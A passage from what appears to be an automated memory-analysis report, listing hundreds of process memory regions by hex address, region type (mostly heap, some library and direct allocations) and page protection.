heap
|
page read and write
|
||
4DF6000
|
heap
|
page read and write
|
||
4FED000
|
heap
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
2BE4000
|
trusted library allocation
|
page read and write
|
||
51A4000
|
heap
|
page read and write
|
||
7FE8B544000
|
trusted library allocation
|
page read and write
|
||
50AA000
|
heap
|
page read and write
|
||
4E44000
|
heap
|
page read and write
|
||
4FFC000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
287000
|
heap
|
page read and write
|
||
4F35000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
4E5F000
|
heap
|
page read and write
|
||
4AF3000
|
heap
|
page read and write
|
||
1160000
|
unkown
|
page readonly
|
||
5080000
|
heap
|
page read and write
|
||
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
369000
|
heap
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
5006000
|
heap
|
page read and write
|
||
4FF9000
|
heap
|
page read and write
|
||
5094000
|
heap
|
page read and write
|
||
504E000
|
heap
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
5113000
|
heap
|
page read and write
|
||
4EE5000
|
heap
|
page read and write
|
||
4FDF000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
406000
|
heap
|
page read and write
|
||
12B57000
|
trusted library allocation
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
4FC4000
|
heap
|
page read and write
|
||
5038000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
33D000
|
heap
|
page read and write
|
||
1ED000
|
heap
|
page read and write
|
||
518C000
|
heap
|
page read and write
|
||
4DFD000
|
heap
|
page read and write
|
||
4EF3000
|
heap
|
page read and write
|
||
4DDA000
|
heap
|
page read and write
|
||
4E21000
|
heap
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
36B7000
|
heap
|
page read and write
|
||
4DC2000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
51A0000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
4E2E000
|
heap
|
page read and write
|
||
5049000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
5065000
|
heap
|
page read and write
|
||
3788000
|
heap
|
page read and write
|
||
4E42000
|
heap
|
page read and write
|
||
4CB1000
|
heap
|
page read and write
|
||
4FFC000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
4DD2000
|
heap
|
page read and write
|
||
50D4000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
1E40000
|
heap
|
page read and write
|
||
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
4E3D000
|
heap
|
page read and write
|
||
4E79000
|
heap
|
page read and write
|
||
50E3000
|
heap
|
page read and write
|
||
4DA6000
|
heap
|
page read and write
|
||
4DBE000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
4D52000
|
heap
|
page read and write
|
||
50F7000
|
heap
|
page read and write
|
||
386000
|
heap
|
page read and write
|
||
2B51000
|
trusted library allocation
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
5175000
|
heap
|
page read and write
|
||
5053000
|
heap
|
page read and write
|
||
4FCE000
|
heap
|
page read and write
|
||
387000
|
heap
|
page read and write
|
||
4D63000
|
heap
|
page read and write
|
||
358000
|
heap
|
page read and write
|
||
4D85000
|
heap
|
page read and write
|
||
4DC000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
4EC4000
|
heap
|
page read and write
|
||
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
500A000
|
heap
|
page read and write
|
||
36FF000
|
heap
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
1E30000
|
heap
|
page execute and read and write
|
||
380000
|
heap
|
page read and write
|
||
30E000
|
heap
|
page read and write
|
||
4E39000
|
heap
|
page read and write
|
||
353000
|
heap
|
page read and write
|
||
502C000
|
heap
|
page read and write
|
||
4DF1000
|
heap
|
page read and write
|
||
351000
|
heap
|
page read and write
|
||
4AA3000
|
heap
|
page read and write
|
||
1B36C000
|
stack
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
4EF0000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
4ED3000
|
heap
|
page read and write
|
||
320000
|
trusted library allocation
|
page read and write
|
||
4EBE000
|
heap
|
page read and write
|
||
508D000
|
heap
|
page read and write
|
||
5062000
|
heap
|
page read and write
|
||
4DFA000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
4B54000
|
heap
|
page read and write
|
||
4DF3000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
364000
|
heap
|
page read and write
|
||
502D000
|
heap
|
page read and write
|
||
3798000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
1D94F000
|
stack
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
3A0000
|
direct allocation
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
516C000
|
heap
|
page read and write
|
||
4EBB000
|
heap
|
page read and write
|
||
4F07000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
4D9E000
|
heap
|
page read and write
|
||
1FA0000
|
direct allocation
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
4D7F000
|
heap
|
page read and write
|
||
368000
|
heap
|
page read and write
|
||
50AD000
|
heap
|
page read and write
|
||
4EF000
|
heap
|
page read and write
|
||
4FB4000
|
heap
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
50F4000
|
heap
|
page read and write
|
||
D30000
|
heap
|
page execute and read and write
|
||
4EC6000
|
heap
|
page read and write
|
||
4E54000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
5053000
|
heap
|
page read and write
|
||
4F17000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
12E75000
|
trusted library allocation
|
page read and write
|
||
4FFB000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
4E2F000
|
heap
|
page read and write
|
||
4E87000
|
heap
|
page read and write
|
||
33C000
|
heap
|
page read and write
|
||
4F2D000
|
heap
|
page read and write
|
||
4DFB000
|
heap
|
page read and write
|
||
508D000
|
heap
|
page read and write
|
||
A50000
|
direct allocation
|
page execute and read and write
|
||
36FF000
|
heap
|
page read and write
|
||
377A000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
5062000
|
heap
|
page read and write
|
||
4B71000
|
heap
|
page read and write
|
||
4EF5000
|
heap
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
4EC2000
|
heap
|
page read and write
|
||
371000
|
heap
|
page read and write
|
||
4E8A000
|
heap
|
page read and write
|
||
4F32000
|
heap
|
page read and write
|
||
4D46000
|
heap
|
page read and write
|
||
4AE9000
|
heap
|
page read and write
|
||
51A2000
|
heap
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
1C3CB000
|
heap
|
page read and write
|
||
4E75000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
39A000
|
heap
|
page read and write
|
||
4F23000
|
heap
|
page read and write
|
||
1A848000
|
heap
|
page execute and read and write
|
||
4EBA000
|
heap
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
4FE3000
|
heap
|
page read and write
|
||
4FF2000
|
heap
|
page read and write
|
||
4D85000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4E32000
|
heap
|
page read and write
|
||
3724000
|
heap
|
page read and write
|
||
510F000
|
heap
|
page read and write
|
||
4E26000
|
heap
|
page read and write
|
||
5079000
|
heap
|
page read and write
|
||
4F9A000
|
heap
|
page read and write
|
||
C7000
|
heap
|
page read and write
|
||
4E3F000
|
heap
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
5086000
|
heap
|
page read and write
|
||
50F5000
|
heap
|
page read and write
|
||
4DF8000
|
heap
|
page read and write
|
||
5015000
|
heap
|
page read and write
|
||
5192000
|
heap
|
page read and write
|
||
5094000
|
heap
|
page read and write
|
||
4F0B000
|
heap
|
page read and write
|
||
519F000
|
heap
|
page read and write
|
||
4DCF000
|
heap
|
page read and write
|
||
7FE8B6F0000
|
trusted library allocation
|
page read and write
|
||
7B7000
|
heap
|
page read and write
|
||
4FD0000
|
heap
|
page read and write
|
||
321000
|
heap
|
page read and write
|
||
394000
|
heap
|
page read and write
|
||
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
5055000
|
heap
|
page read and write
|
||
4E8D000
|
heap
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
12E70000
|
trusted library allocation
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
33C000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
4E34000
|
heap
|
page read and write
|
||
5088000
|
heap
|
page read and write
|
||
4F0D000
|
heap
|
page read and write
|
||
3B73000
|
heap
|
page read and write
|
||
7FE89C38000
|
trusted library allocation
|
page read and write
|
||
361000
|
heap
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
4D4F000
|
heap
|
page read and write
|
||
4E78000
|
heap
|
page read and write
|
||
4F9B000
|
heap
|
page read and write
|
||
5002000
|
heap
|
page read and write
|
||
4E59000
|
heap
|
page read and write
|
||
4FEE000
|
heap
|
page read and write
|
||
502A000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
4E3B000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
5091000
|
heap
|
page read and write
|
||
36BA000
|
heap
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
4EFD000
|
heap
|
page read and write
|
||
4DC3000
|
heap
|
page read and write
|
||
4FA2000
|
heap
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
51AA000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
1BD5D000
|
heap
|
page read and write
|
||
4F4B000
|
heap
|
page read and write
|
||
4F99000
|
heap
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
1A772000
|
heap
|
page read and write
|
||
4FD4000
|
heap
|
page read and write
|
||
4D9D000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
4ECB000
|
heap
|
page read and write
|
||
4DEF000
|
heap
|
page read and write
|
||
4F64000
|
heap
|
page read and write
|
||
4D44000
|
heap
|
page read and write
|
||
1D70000
|
direct allocation
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
4A78000
|
heap
|
page read and write
|
||
1C395000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
1DA4000
|
heap
|
page read and write
|
||
5028000
|
heap
|
page read and write
|
||
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
4F09000
|
heap
|
page read and write
|
||
4D9D000
|
heap
|
page read and write
|
||
1C87B000
|
stack
|
page read and write
|
||
4D79000
|
heap
|
page read and write
|
||
5015000
|
heap
|
page read and write
|
||
5027000
|
heap
|
page read and write
|
||
30F000
|
heap
|
page read and write
|
||
5054000
|
heap
|
page read and write
|
||
4E40000
|
heap
|
page read and write
|
||
4D67000
|
heap
|
page read and write
|
||
4EDC000
|
heap
|
page read and write
|
||
3A3000
|
heap
|
page read and write
|
||
399000
|
heap
|
page read and write
|
||
383000
|
heap
|
page read and write
|
||
356000
|
heap
|
page read and write
|
||
4FC6000
|
heap
|
page read and write
|
||
4F85000
|
heap
|
page read and write
|
||
4E96000
|
heap
|
page read and write
|
||
4FDB000
|
heap
|
page read and write
|
||
4AF3000
|
heap
|
page read and write
|
||
339000
|
heap
|
page read and write
|
||
4EC2000
|
heap
|
page read and write
|
||
2B4F000
|
stack
|
page read and write
|
||
2EA000
|
heap
|
page read and write
|
||
1FA7000
|
direct allocation
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
4DDF000
|
heap
|
page read and write
|
||
4E34000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
A40000
|
direct allocation
|
page execute and read and write
|
||
4FE8000
|
heap
|
page read and write
|
||
4DFC000
|
heap
|
page read and write
|
||
4FC7000
|
heap
|
page read and write
|
||
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
2430000
|
heap
|
page read and write
|
||
50EA000
|
heap
|
page read and write
|
||
5012000
|
heap
|
page read and write
|
||
4F2D000
|
heap
|
page read and write
|
||
4DFA000
|
heap
|
page read and write
|
||
3786000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
4DC6000
|
heap
|
page read and write
|
||
4EC8000
|
heap
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
44E000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
50EC000
|
heap
|
page read and write
|
||
50A5000
|
heap
|
page read and write
|
||
2C34000
|
heap
|
page read and write
|
||
2BE000
|
heap
|
page read and write
|
||
311000
|
heap
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
3B60000
|
heap
|
page read and write
|
||
4DFF000
|
heap
|
page read and write
|
||
4EC7000
|
heap
|
page read and write
|
||
4EC4000
|
heap
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
502F000
|
heap
|
page read and write
|
||
39E000
|
heap
|
page read and write
|
||
4E79000
|
heap
|
page read and write
|
||
3A7000
|
direct allocation
|
page read and write
|
||
5071000
|
heap
|
page read and write
|
||
3BE0000
|
trusted library allocation
|
page read and write
|
||
4D9D000
|
heap
|
page read and write
|
||
7FE89B95000
|
trusted library allocation
|
page read and write
|
||
1DC0000
|
heap
|
page read and write
|
||
4E3E000
|
heap
|
page read and write
|
||
516D000
|
heap
|
page read and write
|
||
502A000
|
heap
|
page read and write
|
||
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
4EFF000
|
heap
|
page read and write
|
||
3162000
|
trusted library allocation
|
page read and write
|
||
4D6B000
|
heap
|
page read and write
|
||
4EC6000
|
heap
|
page read and write
|
||
4F94000
|
heap
|
page read and write
|
||
4F8C000
|
heap
|
page read and write
|
||
1A840000
|
heap
|
page execute and read and write
|
||
381000
|
heap
|
page read and write
|
||
4EEF000
|
heap
|
page read and write
|
||
4ED1000
|
heap
|
page read and write
|
||
4FFC000
|
heap
|
page read and write
|
||
3C20000
|
trusted library allocation
|
page read and write
|
||
4F7C000
|
heap
|
page read and write
|
||
51AC000
|
heap
|
page read and write
|
||
4AF3000
|
heap
|
page read and write
|
||
12B51000
|
trusted library allocation
|
page read and write
|
||
456000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
387000
|
heap
|
page read and write
|
||
3E20000
|
trusted library allocation
|
page read and write
|
||
4DE7000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
3719000
|
heap
|
page read and write
|
||
506B000
|
heap
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
4EC9000
|
heap
|
page read and write
|
||
4E68000
|
heap
|
page read and write
|
||
4180000
|
heap
|
page read and write
|
||
12D7B000
|
trusted library allocation
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
50E6000
|
heap
|
page read and write
|
||
4D42000
|
heap
|
page read and write
|
||
4F7D000
|
heap
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
38B000
|
heap
|
page read and write
|
||
517F000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
3798000
|
heap
|
page read and write
|
||
3724000
|
heap
|
page read and write
|
||
4F8C000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
4DB7000
|
heap
|
page read and write
|
||
7FE89C1D000
|
trusted library allocation
|
page read and write
|
||
4FBB000
|
heap
|
page read and write
|
||
7FE89C1A000
|
trusted library allocation
|
page read and write
|
||
1B26B000
|
heap
|
page read and write
|
||
447E000
|
stack
|
page read and write
|
||
508C000
|
heap
|
page read and write
|
||
311000
|
heap
|
page read and write
|
||
502B000
|
heap
|
page read and write
|
||
3B30000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
4DAA000
|
heap
|
page read and write
|
||
2F69000
|
trusted library allocation
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
4FCA000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
4F18000
|
heap
|
page read and write
|
||
4D67000
|
heap
|
page read and write
|
||
30E000
|
heap
|
page read and write
|
||
5015000
|
heap
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
1B2ED000
|
stack
|
page read and write
|
||
5008000
|
heap
|
page read and write
|
||
5047000
|
heap
|
page read and write
|
||
3095000
|
trusted library allocation
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
8E0000
|
trusted library section
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
5055000
|
heap
|
page read and write
|
||
418000
|
heap
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
4D6F000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
3B90000
|
heap
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
4EE5000
|
heap
|
page read and write
|
||
342000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
4D8F000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
4D81000
|
heap
|
page read and write
|
||
4EA5000
|
heap
|
page read and write
|
||
504E000
|
heap
|
page read and write
|
||
BB0000
|
direct allocation
|
page execute and read and write
|
||
4FE1000
|
heap
|
page read and write
|
||
3D2000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
50D4000
|
heap
|
page read and write
|
||
5025000
|
heap
|
page read and write
|
||
3FB000
|
heap
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
4E66000
|
heap
|
page read and write
|
||
4FB7000
|
heap
|
page read and write
|
||
4D6C000
|
heap
|
page read and write
|
||
5027000
|
heap
|
page read and write
|
||
1C2B5000
|
heap
|
page read and write
|
||
4FEC000
|
heap
|
page read and write
|
||
4D44000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
5012000
|
heap
|
page read and write
|
||
4E6D000
|
heap
|
page read and write
|
||
4F83000
|
heap
|
page read and write
|
||
7FE8B702000
|
trusted library allocation
|
page read and write
|
||
507B000
|
heap
|
page read and write
|
||
4DC7000
|
heap
|
page read and write
|
||
5199000
|
heap
|
page read and write
|
||
365000
|
heap
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
4F7C000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4FD0000
|
heap
|
page read and write
|
||
4D56000
|
heap
|
page read and write
|
||
4EC9000
|
heap
|
page read and write
|
||
4FC5000
|
heap
|
page read and write
|
||
1BA5F000
|
stack
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
34A000
|
heap
|
page read and write
|
||
345000
|
heap
|
page read and write
|
||
50A7000
|
heap
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
4E63000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
1C2BB000
|
heap
|
page read and write
|
||
4DCA000
|
heap
|
page read and write
|
||
434E000
|
stack
|
page read and write
|
||
4A3E000
|
heap
|
page read and write
|
||
508A000
|
heap
|
page read and write
|
||
1E76000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
5175000
|
heap
|
page read and write
|
||
5037000
|
heap
|
page read and write
|
||
4D71000
|
heap
|
page read and write
|
||
3738000
|
heap
|
page read and write
|
||
4D78000
|
heap
|
page read and write
|
||
4B6F000
|
heap
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
4FE2000
|
heap
|
page read and write
|
||
22D000
|
stack
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
2F67000
|
trusted library allocation
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
5039000
|
heap
|
page read and write
|
||
1F80000
|
direct allocation
|
page read and write
|
||
2D0000
|
heap
|
page read and write
|
||
4E20000
|
heap
|
page read and write
|
||
1D10000
|
trusted library allocation
|
page read and write
|
||
4FBE000
|
heap
|
page read and write
|
||
7FE8B540000
|
trusted library allocation
|
page read and write
|
||
4E3F000
|
heap
|
page read and write
|
||
4FD9000
|
heap
|
page read and write
|
||
4B45000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
5045000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
5034000
|
heap
|
page read and write
|
||
54D9000
|
heap
|
page read and write
|
||
5031000
|
heap
|
page read and write
|
||
4FC3000
|
heap
|
page read and write
|
||
4E20000
|
heap
|
page read and write
|
||
1DA0000
|
heap
|
page read and write
|
||
4660000
|
trusted library allocation
|
page read and write
|
||
36C000
|
heap
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
1B235000
|
heap
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
36F000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
4D70000
|
heap
|
page read and write
|
||
501A000
|
heap
|
page read and write
|
||
4FE2000
|
heap
|
page read and write
|
||
4D6000
|
heap
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
4EFE000
|
heap
|
page read and write
|
||
4B74000
|
heap
|
page read and write
|
||
50D9000
|
heap
|
page read and write
|
||
5094000
|
heap
|
page read and write
|
||
4EEE000
|
heap
|
page read and write
|
||
4E12000
|
heap
|
page read and write
|
||
4D4C000
|
heap
|
page read and write
|
||
4B3000
|
heap
|
page read and write
|
||
3B6000
|
heap
|
page read and write
|
||
4EF6000
|
heap
|
page read and write
|
||
43F000
|
heap
|
page read and write
|
||
4B74000
|
heap
|
page read and write
|
||
1C2C1000
|
heap
|
page read and write
|
||
4D75000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
4E94000
|
heap
|
page read and write
|
||
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
4FC5000
|
heap
|
page read and write
|
||
4D8000
|
heap
|
page read and write
|
||
355000
|
heap
|
page read and write
|
||
1C3F0000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
144000
|
heap
|
page read and write
|
||
51A6000
|
heap
|
page read and write
|
||
4E28000
|
heap
|
page read and write
|
||
4F9E000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
5182000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
30F000
|
heap
|
page read and write
|
||
1F60000
|
direct allocation
|
page read and write
|
||
4FED000
|
heap
|
page read and write
|
||
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
4F48000
|
heap
|
page read and write
|
||
4E4B000
|
heap
|
page read and write
|
||
4E45000
|
heap
|
page read and write
|
||
4DB5000
|
heap
|
page read and write
|
||
B30000
|
direct allocation
|
page execute and read and write
|
||
4E38000
|
heap
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
4E4D000
|
heap
|
page read and write
|
||
4E84000
|
heap
|
page read and write
|
||
38C000
|
heap
|
page read and write
|
||
455000
|
heap
|
page read and write
|
||
CC7000
|
direct allocation
|
page execute and read and write
|
||
505B000
|
heap
|
page read and write
|
||
125000
|
stack
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
4EBB000
|
heap
|
page read and write
|
||
5033000
|
heap
|
page read and write
|
||
4E60000
|
heap
|
page read and write
|
||
250D000
|
trusted library allocation
|
page read and write
|
||
50F4000
|
heap
|
page read and write
|
||
4E96000
|
heap
|
page read and write
|
||
12C3E000
|
trusted library allocation
|
page read and write
|
||
4B45000
|
heap
|
page read and write
|
||
51A8000
|
heap
|
page read and write
|
||
3A2000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
4E67000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
4E51000
|
heap
|
page read and write
|
||
491000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
50A2000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
2F65000
|
trusted library allocation
|
page read and write
|
||
5188000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4DA5000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
4FD8000
|
heap
|
page read and write
|
||
36AC000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
4EA6000
|
heap
|
page read and write
|
||
1C7AF000
|
stack
|
page read and write
|
||
4D63000
|
heap
|
page read and write
|
||
5127000
|
heap
|
page read and write
|
||
7FE89CC0000
|
trusted library allocation
|
page read and write
|
||
4EBB000
|
heap
|
page read and write
|
||
4F1E000
|
heap
|
page read and write
|
||
4B2B000
|
heap
|
page read and write
|
||
36A000
|
heap
|
page read and write
|
||
1C155000
|
heap
|
page read and write
|
||
5175000
|
heap
|
page read and write
|
||
4FC7000
|
heap
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
4D44000
|
heap
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
4FE6000
|
heap
|
page read and write
|
||
3F90000
|
trusted library allocation
|
page read and write
|
||
4DD6000
|
heap
|
page read and write
|
||
4D71000
|
heap
|
page read and write
|
||
4DFF000
|
heap
|
page read and write
|
||
4DFB000
|
heap
|
page read and write
|
||
49F8000
|
heap
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
2F50000
|
remote allocation
|
page read and write
|
||
4EBE000
|
heap
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
4E55000
|
heap
|
page read and write
|
||
4FFA000
|
heap
|
page read and write
|
||
3724000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
4F61000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
1300A000
|
trusted library allocation
|
page read and write
|
||
4FDE000
|
heap
|
page read and write
|
||
516D000
|
heap
|
page read and write
|
||
12628000
|
trusted library allocation
|
page read and write
|
||
4EC2000
|
heap
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
508D000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
50FB000
|
heap
|
page read and write
|
||
516C000
|
heap
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
4D7A000
|
heap
|
page read and write
|
||
4DFF000
|
heap
|
page read and write
|
||
50E6000
|
heap
|
page read and write
|
||
12C39000
|
trusted library allocation
|
page read and write
|
||
379D000
|
heap
|
page read and write
|
||
4D8E000
|
heap
|
page read and write
|
||
4F2F000
|
heap
|
page read and write
|
||
5033000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
4E6A000
|
heap
|
page read and write
|
||
50D4000
|
heap
|
page read and write
|
||
4E9B000
|
heap
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
4F60000
|
heap
|
page read and write
|
||
4E6F000
|
heap
|
page read and write
|
||
4DE4000
|
heap
|
page read and write
|
||
321B000
|
stack
|
page read and write
|
||
4FB8000
|
heap
|
page read and write
|
||
130CD000
|
trusted library allocation
|
page read and write
|
||
4E98000
|
heap
|
page read and write
|
||
504A000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
2F61000
|
trusted library allocation
|
page read and write
|
||
371A000
|
heap
|
page read and write
|
||
4F17000
|
heap
|
page read and write
|
||
5076000
|
heap
|
page read and write
|
||
4FF6000
|
heap
|
page read and write
|
||
50F6000
|
heap
|
page read and write
|
||
3C0000
|
direct allocation
|
page read and write
|
||
4D65000
|
heap
|
page read and write
|
||
4E5F000
|
heap
|
page read and write
|
||
518C000
|
heap
|
page read and write
|
||
4D86000
|
heap
|
page read and write
|
||
50D8000
|
heap
|
page read and write
|
||
3EB1000
|
heap
|
page read and write
|
||
4ECD000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
5072000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
4F28000
|
